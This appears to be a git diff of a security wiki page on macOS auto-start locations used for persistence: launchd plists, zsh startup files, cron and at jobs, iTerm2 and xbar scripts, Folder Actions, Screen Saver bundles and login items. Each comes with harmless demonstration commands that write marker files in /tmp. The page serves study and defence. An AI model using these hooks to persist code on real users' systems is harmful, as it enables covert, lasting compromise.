+#### Locations
+
+* **`/Library/LaunchAgents`**
+ * **Trigger**: Reboot
+ * Root required
+* **`/Library/LaunchDaemons`**
+ * **Trigger**: Reboot
+ * Root required
+* **`/System/Library/LaunchAgents`**
+ * **Trigger**: Reboot
+ * Root required
+* **`/System/Library/LaunchDaemons`**
+ * **Trigger**: Reboot
+ * Root required
+* **`~/Library/LaunchAgents`**
+ * **Trigger**: Relog-in
+* **`~/Library/LaunchDemons`**
+ * **Trigger**: Relog-in
+
+#### Description & Payload
+
**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
* `/Library/LaunchAgents`: Per-user agents installed by the admin
@@ -36,7 +57,7 @@ The **main difference between agents and daemons is that agents are loaded when
com.apple.someidentifierProgramArguments
- /Users/username/malware
+ bash -c 'touch /tmp/launched'RunAtLoadStartInterval
@@ -52,10 +73,12 @@ The **main difference between agents and daemons is that agents are loaded when
There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example).
-\{% hint style="info" %\} New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\
+{% hint style="info" %}
+New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\
It's also possible to **unload** with `launchctl unload ` (the process pointed by it will be terminated),
-To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` \{% endhint %\}
+To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`
+{% endhint %}
List all the agents and daemons loaded by the current user:
@@ -63,8 +86,161 @@ List all the agents and daemons loaded by the current user:
launchctl list
```
+### shell startup files
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\
+Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
+
+#### Locations
+
+* **`~/.zshrc`, `~/.zlogin`, `~/.zshenv`, `~/.zprofile`**
+ * **Trigger**: Open a terminal with zsh
+* **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`**
+ * **Trigger**: Open a terminal with zsh
+ * Root required
+* **`~/.zlogout`**
+ * **Trigger**: Exit a terminal with zsh
+* **`/etc/zlogout`**
+ * **Trigger**: Exit a terminal with zsh
+ * Root required
+* Potentially more in: **`man zsh`**
+* **`~/.bashrc`**
+ * **Trigger**: Open a terminal with bash
+* `/etc/profile` (didn't work)
+* `~/.profile` (didn't work)
+* `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/`
+ * **Trigger**: Expected to trigger with xterm, but it **isn't installed** and even after installed this error is thrown: xterm: `DISPLAY is not set`
+
+#### Description
+
+Shell startup files are executed when our shell environment like `zsh` or `bash` is **starting up**. macOS defaults to `/bin/zsh` these days, and **whenever we open `Terminal` or SSH** into the device, this is the shell environment we are placed into. `bash` and `sh` are still available, however they have to be specifically started.
+
+The man page of zsh, which we can read with **`man zsh`** has a long description of the startup files.
+
+```bash
+# Example executino via ~/.zshrc
+echo "touch /tmp/hacktricks" >> ~/.zshrc
+```
+
+### iTerm2
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/)
+
+#### Locations
+
+* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
+ * **Trigger**: Open iTerm
+* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
+ * **Trigger**: Open iTerm
+* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
+ * **Trigger**: Open iTerm
+
+#### Description
+
+Scripts stored in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** will be executed. For example:
+
+```bash
+cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
+#!/bin/bash
+touch /tmp/iterm2-autolaunch
+EOF
+
+chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
+```
+
+The script **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** will also be executed:
+
+```bash
+do shell script "touch /tmp/iterm2-autolaunchscpt"
+```
+
+The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2.plist`** can **indicate a command to execute** when the iTerm2 terminal is opened.
+
+This setting can be configured in the iTerm2 settings:
+
+
+
+And the command is reflected in the preferences:
+
+```bash
+plutil -p com.googlecode.iterm2.plist
+{
+ [...]
+ "New Bookmarks" => [
+ 0 => {
+ [...]
+ "Initial Text" => "touch /tmp/iterm-start-command"
+```
+
+You can set the command to execute with:
+
+{% code overflow="wrap" %}
+```bash
+# Add
+/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
+
+# Remove
+/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
+```
+{% endcode %}
+
+{% hint style="warning" %}
+Highly probable there are **other ways to abuse the iTerm2 preferences** to execute arbitrary commands.
+{% endhint %}
+
+### Re-opened Applications
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/)
+
+#### Location
+
+* **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`**
+ * **Trigger**: Restart reopening applications
+
+#### Description & Exploit
+
+All the applications to reopen are inside the plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist`
+
+So, make the reopen applications launch your own one, you just need to **add your app to the list**.
+
+The UUID can be found listing that directory or with `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'`
+
+To check the applications that will be reopened you can do:
+
+```bash
+defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
+#or
+plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist
+```
+
+To **add an application to this list** you can use:
+
+```bash
+# Adding iTerm2
+/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
+ -c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
+ ~/Library/Preferences/ByHost/com.apple.loginwindow..plist
+```
+
+{% hint style="danger" %}
+Adding the previous section and loging-out and loging-in or even rebooting didn't work for me to execute the app. (The app wasn't being executed, maybe it needs to be running when these actions are performed)
+{% endhint %}
+
### Cron
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/)
+
+#### Location
+
+* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`**
+ * Root required for direct write access. No root required if you can execute `crontab `
+ * **Trigger**: Depends on the cron job
+
+#### Description & Exploit
+
List the cron jobs of the **current user** with:
```bash
@@ -81,14 +257,410 @@ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`.
-The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that if a script is stored in `/etc/periodic/` as a way to **escalate privilege**s, it will be **executed** as the **owner of the file**.
+To add a **user cronjob programatically** it's possible to use:
```bash
+echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
+crontab /tmp/cron
+```
+
+### Periodic
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/)
+
+#### Location
+
+* `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic`
+ * Root required
+ * **Trigger**: When the time comes
+* `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local`
+ * Root required
+ * **Trigger**: When the time comes
+
+#### Description & Exploit
+
+The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that scripts stored in `/etc/periodic/` are **executed** as the **owner of the file,** so this won't work for a potential privilege escalation.
+
+{% code overflow="wrap" %}
+```bash
+# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
+
+# The scripts located in their locations
+ls -lR /etc/periodic
+total 0
+drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
+drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
+drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
+
+/etc/periodic/daily:
+total 72
+-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
+-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
+[...]
+
+/etc/periodic/monthly:
+total 24
+-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
+-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
+-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
+
+/etc/periodic/weekly:
+total 8
+-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
```
+{% endcode %}
+
+There are other periodic scripts that will be executed indicated in **`/etc/defaults/periodic.conf`**:
+
+```bash
+grep "Local scripts" /etc/defaults/periodic.conf
+daily_local="/etc/daily.local" # Local scripts
+weekly_local="/etc/weekly.local" # Local scripts
+monthly_local="/etc/monthly.local" # Local scripts
+```
+
+If you manage to write any of the files `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` it will be **executed sooner or later**.
+
+### PAM
+
+Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/)
+
+#### Location
+
+* Root always required
+
+#### Description
+
+As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**.
+
+### SSHRC
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/)
+
+#### Location
+
+* **`~/.ssh/rc`**
+ * **Trigger**: Login via ssh
+* **`/etc/ssh/sshrc`**
+ * Root required
+ * **Trigger**: Login via ssh
+
+#### Description
+
+By default, unless `PermitUserRC no` in `/etc/ssh/sshd_config`, when a user **logins via SSH** the scripts **`/etc/ssh/sshrc`** and **`~/.ssh/rc`** will be executed.
+
+### xbar
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/)
+
+#### Location
+
+* **`~/Library/Application\ Support/xbar/plugins/`**
+ * **Trigger**: Once xbar is executed
+
+#### Description
+
+If the popular program [**xbar**](https://github.com/matryer/xbar) is installed, it's possible to write a shell script in **`~/Library/Application\ Support/xbar/plugins/`** which will be executed when xbar is started:
+
+```bash
+cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
+#!/bin/bash
+touch /tmp/xbar
+EOF
+chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
+```
+
+### Hammerspoon
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/)
+
+#### Location
+
+* **`~/.hammerspoon/init.lua`**
+ * **Trigger**: Once hammerspoon is executed
+
+#### Description
+
+[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) is an automation tool, that allows **macOS scripting through LUA scripting language**. We can even embed full AppleScript code as well as run shell scripts.
+
+The app looks for a single file, `~/.hammerspoon/init.lua`, and when started the script will be executed.
+
+```bash
+cat > "$HOME/.hammerspoon/init.lua" << EOF
+hs.execute("id > /tmp/hs.txt")
+EOF
+```
+
+### Preference Pane
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/)
+
+#### Location
+
+* **`/System/Library/PreferencePanes`**
+* **`/Library/PreferencePanes`**
+* **`~/Library/PreferencePanes`**
+
+#### Description
+
+It doesn't look like this is working anymore.
+
+### Spotlight Importers
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/)
+
+#### Location
+
+* **`/Library/Spotlight`**
+* **`~/Library/Spotlight`**
+
+#### Description
+
+You will end up in a **heavy sandbox**, so you probably don't want to use this technique.
+
+### Audio Plugins
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\
+Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882)
+
+#### Location
+
+* **`/Library/Audio/Plug-Ins/HAL`**
+ * Root required
+ * **Trigger**: Restart coreaudiod or the computer
+* **`/Library/Audio/Plug-ins/Components`**
+ * Root required
+ * **Trigger**: Restart coreaudiod or the computer
+* **`~/Library/Audio/Plug-ins/Components`**
+ * **Trigger**: Restart coreaudiod or the computer
+* **`/System/Library/Components`**
+ * Root required
+ * **Trigger**: Restart coreaudiod or the computer
+
+#### Description
+
+According to the previous writeups it's possible to **compile some audio plugins** and get them loaded.
+
+### Folder Actions
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\
+Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d)
+
+#### Location
+
+* `/Library/Scripts/Folder Action Scripts`
+ * Root required
+* `~/Library/Scripts/Folder Action Scripts`
+
+#### Description & Exploitation
+
+A Folder Action script is executed when the folder to which it is attached has items added or removed, or when its window is opened, closed, moved, or resized:
+
+* Open the folder via the Finder UI
+* Add a file to the folder (can be done via drag/drop or even in a shell prompt from a terminal)
+* Remove a file from the folder (can be done via drag/drop or even in a shell prompt from a terminal)
+* Navigate out of the folder via the UI
+
+There are a couple ways to implement this:
+
+1. Use the [Automator](https://support.apple.com/guide/automator/welcome/mac) program to create a Folder Action workflow file (.workflow) and install it as a service.
+2. Right-click on a folder, select `Folder Actions Setup...`, `Run Service`, and manually attach a script.
+3. Use OSAScript to send Apple Event messages to the `System Events.app` to programmatically query and register a new `Folder Action.`
+
+* This is the way to implement persistence using an OSAScript to send Apple Event messages to `System Events.app`
+
+This is the script that will be executed:
+
+{% code title="source.js" %}
+```applescript
+var app = Application.currentApplication();
+app.includeStandardAdditions = true;
+app.doShellScript("touch /tmp/folderaction.txt");
+app.doShellScript("touch ~/Desktop/folderaction.txt");
+app.doShellScript("mkdir /tmp/asd123");
+app.doShellScript("cp -R ~/Desktop /tmp/asd123");
+```
+{% endcode %}
+
+Compile it with: `osacompile -l JavaScript -o folder.scpt source.js`
+
+Then execute the following script to enable Folder Actions and attach the previously compiled script with the folde **`/users/username/Desktop`**:
+
+```javascript
+var se = Application("System Events");
+se.folderActionsEnabled = true;
+var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
+var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
+se.folderActions.push(fa);
+fa.scripts.push(myScript);
+```
+
+Execute script with: `osascript -l JavaScript /Users/carlospolop/attach.scpt`
+
+
+
+* This is the way yo implement this persistence via GUI:
+
+This is the script that will be executed:
+
+{% code title="source.js" %}
+```applescript
+var app = Application.currentApplication();
+app.includeStandardAdditions = true;
+app.doShellScript("touch /tmp/folderaction.txt");
+app.doShellScript("touch ~/Desktop/folderaction.txt");
+app.doShellScript("mkdir /tmp/asd123");
+app.doShellScript("cp -R ~/Desktop /tmp/asd123");
+```
+{% endcode %}
+
+Compile it with: `osacompile -l JavaScript -o folder.scpt source.js`
+
+Move it to:
+
+```bash
+mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
+mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
+```
+
+Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp):
+
+
+
+Now, if you open that folder with **Finder**, your script will be executed.
+
+This configuration was stored in the **plist** located in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64 format.
+
+Now, lets try to prepare this persistence without GUI access:
+
+1. **Copy `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** to `/tmp` to backup it:
+ * `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
+2. **Remove** the Folder Actions you just set:
+
+
+
+Now that we have an empty environment
+
+3. Copy the backup file: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
+4. Open the Folder Actions Setup.app to consume this config: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`
+
+{% hint style="danger" %}
+And this didn't work for me, but those are the instructions from the writeup:(
+{% endhint %}
+
+### Dock shortcuts
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/)
+
+#### Location
+
+* `~/Library/Preferences/com.apple.dock.plist`
+ * **Trigger**: When the user clicks on the app inside the dock
+
+#### Description & Exploitation
+
+All the applications that appear in the Dock are specified inside the plist: **`~/Library/Preferences/com.apple.dock.plist`**
+
+It's possible to **add an application** just with:
+
+{% code overflow="wrap" %}
+```bash
+# Add /System/Applications/Books.app
+defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/System/Applications/Books.app_CFURLStringType0'
+
+# Restart Dock
+killall Dock
+```
+{% endcode %}
+
+### emond
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
+
+I cannot find this component in my macOS so for more info check the writeup
+
+### QuickLook Plugins
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)
+
+#### Location
+
+* `/System/Library/QuickLook`
+* `/Library/QuickLook`
+* `~/Library/QuickLook`
+* `/Applications/AppNameHere/Contents/Library/QuickLook/`
+* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
+
+#### Description & Exploitation
+
+QuickLook plugins can be executed when you **trigger the preview of a file** (press space bar with the file selected in Finder) and a **plugin supporting that file type** is installed.
+
+It's possible to compile your own QuickLook plugin, place it in one of the prevous locations to load it and then go to a supported file and press space to trigger it.
+
+### Authorization Plugins
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\
+Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65)
+
+#### Location
+
+* `/Library/Security/SecurityAgentPlugins/`
+ * Root required
+ * It's also needed
+
+#### Description & Exploitation
+
+Todo
+
+### Color Pickers
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/)
+
+#### Location
+
+* `/Library/ColorPickers`
+ * Root required
+ * Trigger: Use the color picker
+* `~/Library/ColorPickers`
+ * Trigger: Use the color picker
+
+#### Description & Exploit
+
+**Compile a color picker** bundle with your code (you could use [**this one for example**](https://github.com/viktorstrate/color-picker-plus)) and add a constructor (like in the [Screen Saver section](macos-auto-start-locations.md#screen-saver)) and copy the bundle to `~/Library/ColorPickers`.
+
+Then, when the color picker is triggered your should should be aswell.
+
+Note that the binary loading your library has a **very restrictive sandbox**: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
+
+{% code overflow="wrap" %}
+```bash
+[Key] com.apple.security.temporary-exception.sbpl
+ [Value]
+ [Array]
+ [String] (deny file-write* (home-subpath "/Library/Colors"))
+ [String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
+ [String] (allow file-read* (extension "com.apple.app-sandbox.read"))
+```
+{% endcode %}
+
+### XQuartz
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/)
+
+#### Location
+
+* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
+ * Root required
+ * **Trigger**: With XQuartz
+
+#### Description & Exploit
+
+XQuartz is **no longer installed in macOS**, so if you want more info check the writeup.
### kext
@@ -111,8 +683,158 @@ kextunload -b com.apple.driver.ExampleBundle
For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture#i-o-kit-drivers).
+### amstoold
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/)
+
+#### Location
+
+* **`/usr/local/bin/amstoold`**
+ * Root required
+
+#### Description & Exploitation
+
+Apparently the `plist` from `/System/Library/LaunchAgents/com.apple.amstoold.plist` was using this binary while exposing a XPC service... the thing is that the binary didn't exist, so you could place something there and when the XPC service gets called your binary will be called.
+
+I can no longer find this in my macOS.
+
+### xsanctl
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/)
+
+#### Location
+
+* **`/Library/Preferences/Xsan/.xsanrc`**
+ * Root required
+ * **Trigger**: When the service is run (rarely)
+
+#### Description & exploit
+
+Apparently it's not very common to run this script and I couldn't even find it in my macOS, so if you want more info check the writeup.
+
+### Screen Saver
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\
+Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b)
+
+#### Location
+
+* `/System/Library/Screen Savers`
+ * Root required
+ * **Trigger**: Select the screen saver
+* `/Library/Screen Savers`
+ * Root required
+ * **Trigger**: Select the screen saver
+* `~/Library/Screen Savers`
+ * **Trigger**: Select the screen saver
+
+
+
+#### Description & Exploit
+
+Create a new project in Xcode and select the template to generate a new **Screen Saver**. Then, are your code to it, for example the following code to generate logs.
+
+**Build** it, and copy the `.saver` bundle to **`~/Library/Screen Savers`**. Then, open the Screen Saver GUI and it you just click on it, it should generate a lot of logs:
+
+{% code overflow="wrap" %}
+```bash
+sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
+
+Timestamp (process)[PID]
+2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
+2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
+2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Note that because inside the entitlements of the binary that loads this code (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) you can find **`com.apple.security.app-sandbox`** you will be **inside the common application sandbox**.
+{% endhint %}
+
+Saver code:
+
+```objectivec
+//
+// ScreenSaverExampleView.m
+// ScreenSaverExample
+//
+// Created by Carlos Polop on 27/9/23.
+//
+
+#import "ScreenSaverExampleView.h"
+
+@implementation ScreenSaverExampleView
+
+- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ self = [super initWithFrame:frame isPreview:isPreview];
+ if (self) {
+ [self setAnimationTimeInterval:1/30.0];
+ }
+ return self;
+}
+
+- (void)startAnimation
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ [super startAnimation];
+}
+
+- (void)stopAnimation
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ [super stopAnimation];
+}
+
+- (void)drawRect:(NSRect)rect
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ [super drawRect:rect];
+}
+
+- (void)animateOneFrame
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ return;
+}
+
+- (BOOL)hasConfigureSheet
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ return NO;
+}
+
+- (NSWindow*)configureSheet
+{
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+ return nil;
+}
+
+__attribute__((constructor))
+void custom(int argc, const char **argv) {
+ NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
+}
+
+@end
+```
+
### **Login Items**
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/)
+
+#### Locations
+
+* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
+ * **Trigger:** Login
+ * Exploit payload stored calling **`osascript`**
+ * TODO: Find a way to directly it in disk (uf there is any)
+* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
+ * **Trigger:** Login
+ * Root required
+
+#### Description
+
In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
It it's possible to list them, add and remove from the command line:
@@ -127,7 +849,9 @@ osascript -e 'tell application "System Events" to make login item at end with pr
osascript -e 'tell application "System Events" to delete login item "itemname"'
```
-These items are stored in the file /Users/\/Library/Application Support/com.apple.backgroundtaskmanagementagent
+These items are stored in the file **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
+
+**Login items** can **also** be indicated in using the API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) which will store the configuration in **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
### ZIP as Login Item
@@ -137,6 +861,14 @@ Another options would be to create the files **`.bash_profile`** and **`.zshenv`
### At
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/)
+
+#### Location
+
+* Need to **execute** **`at`** and it must be **enabled**
+
+#### **Description**
+
“At tasks” are used to **schedule tasks at specific times**.\
These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat.
@@ -146,16 +878,84 @@ By **default** they are **disabled** but the **root** user can **enable** **them
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
-This will create a file at 13:37:
+This will create a file in 1 hour:
```bash
-echo hello > /tmp/hello | at 1337
+echo "echo 11 > /tmp/at.txt" | at now+1
```
+Check the job queue using `atq:`
+
+```shell-session
+sh-3.2# atq
+26 Tue Apr 27 00:46:00 2021
+22 Wed Apr 28 00:29:00 2021
+```
+
+Above we can see two jobs scheduled. We can print the details of the job using `at -c JOBNUMBER`
+
+```shell-session
+sh-3.2# at -c 26
+#!/bin/sh
+# atrun uid=0 gid=0
+# mail csaby 0
+umask 22
+SHELL=/bin/sh; export SHELL
+TERM=xterm-256color; export TERM
+USER=root; export USER
+SUDO_USER=csaby; export SUDO_USER
+SUDO_UID=501; export SUDO_UID
+SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
+__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
+MAIL=/var/mail/root; export MAIL
+PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
+PWD=/Users/csaby; export PWD
+SHLVL=1; export SHLVL
+SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
+HOME=/var/root; export HOME
+LOGNAME=root; export LOGNAME
+LC_CTYPE=UTF-8; export LC_CTYPE
+SUDO_GID=20; export SUDO_GID
+_=/usr/bin/at; export _
+cd /Users/csaby || {
+ echo 'Execution directory inaccessible' >&2
+ exit 1
+}
+unset OLDPWD
+echo 11 > /tmp/at.txt
+```
+
+{% hint style="warning" %}
If AT tasks aren't enabled the created tasks won't be executed.
+{% endhint %}
+
+The **job files** can be found at `/private/var/at/jobs/`
+
+```
+sh-3.2# ls -l /private/var/at/jobs/
+total 32
+-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
+-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
+-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
+-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
+```
+
+The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at `a0001a019bdcd2`.
+
+* `a` - this is the queue
+* `0001a` - job number in hex, `0x1a = 26`
